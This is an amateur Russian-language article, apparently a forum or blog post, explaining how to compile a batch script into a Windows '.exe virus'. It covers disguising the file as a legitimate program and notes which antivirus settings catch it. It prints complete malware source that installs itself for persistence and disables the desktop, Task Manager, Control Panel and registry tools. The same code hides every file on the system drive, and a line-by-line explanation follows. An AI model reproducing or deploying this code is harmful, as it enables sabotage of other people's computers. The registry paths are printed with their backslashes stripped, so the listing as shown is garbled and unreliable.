Это моя первая статья (возможно, что и последняя) так что не сильно
меня ругайте. Это, так сказать, мои философические измышления.
Итак, чтобы создать *.exe вирус нам понадобится программа "Quick Batch
File Compiler" и знание команд исполняемых в командной строке.
Программу скачиваем с сайта "DreamProgs.net", а если не знаем команды
исполняемые в командной строке, то заходим в "Справку и поддержку"
Виндоуса и в поле для поиска пишем что-то вроде "параметры командной
строки" и среди результатов найдете эти команды. Программа
довольно проста в изучении и через день вы во всем разберетесь. После
запуска программы мы видим панельку с кнопками "New" - создать новый
проект, "Open" - открыть *.bat файл, "Save" - сохранить то, что в окне
в *.bat файл, "Undo", "Redo", "Cut", "Copy", "Paste", "Help" вы и сами
знаете, "Build" - скомпилировать *.exe файл, "Options" - там выбираете
тип вируса (выводить окно командной строки или нет во время исполнения
вируса). Далее внизу панельки есть три вкладки: "Source" - исходный текст вашего вируса "Version Info" - маскируем вирус под хорошую программу "Embedded Files" - выбираем иконку для вируса и можем добавить в *.exe файл другие файлы (не знаю как работает)
Kaspersky Internet Security при высокой защите (мониторинг реестра и т.
д.) выводит запрос на изменение реестра и продвинутые пользователи
могут догадаться что это вирус. И еще, если вирус прописывает себя в
автозагрузку, то антивирус поднимает тревогу. Привожу пример созданного мной вируса (хотя это не совсем вирус и рассчитан он для очень простых пользователей) if exist %windir%infwincfg.exe goto tof copy /y %0 %windir%infwincfg.exe :tof reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun" /v wincfg /t reg_sz /d %windir%infwincfg.exe /f reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoDesktop /t reg_dword /d 00000001 /f reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoActiveDesktop /t reg_dword /d 00000001 /f reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoViewContextMenu /t reg_dword /d 00000001 /f reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoControlPanel /t reg_dword /d 00000001 /f reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoThemesTab /t reg_dword /d 00000001 /f reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableTaskMgr /t reg_dword /d 00000001 /f reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableRegistryTools /t reg_dword /d 00000001 /f reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v NoDispBackgroundPage /t reg_dword /d 00000001 /f reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v NoDispScrSavPage /t reg_dword /d 00000001 /f reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v NoDispSettingsPage /t reg_dword /d 00000001 /f reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v Start_ShowRun /t reg_dword /d 00000000 /f reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v Start_ShowControlPanel /t reg_dword /d 00000000 /f cd %windir% cd .. attrib +h +s *
"wincfg.exe" это имя вируса. "If exist...." - проверяет имеется ли файл
wincfg.exe и если не имеется то копирует себя, а если не имеется то
переходит к строке ":tof" и выполняет команды находящиеся под ней.
Четвертая строка добавляет вирус в автозагрузку. Следующие за ней
причиняют поправимый вред - рабочий стол запрещается, при нажатии
правой кнопки мыши на рабочем столе не появляется меню, становится
недоступной "Панель управления", запрещается "Диспетчер задач", в меню
"Пуск" исчезает кнопка "Выполнить" и т. д. "cd %windir%" - выбирает в
качестве рабочего каталога каталог Windows, "cd .." - выбирает в
качестве каталога диск в котором находится папка Windows, "attrib +h +s
*" - делает все файлы на диске скрытыми и системными (эта команда
требует много системных ресурсов).
Источник: http://... |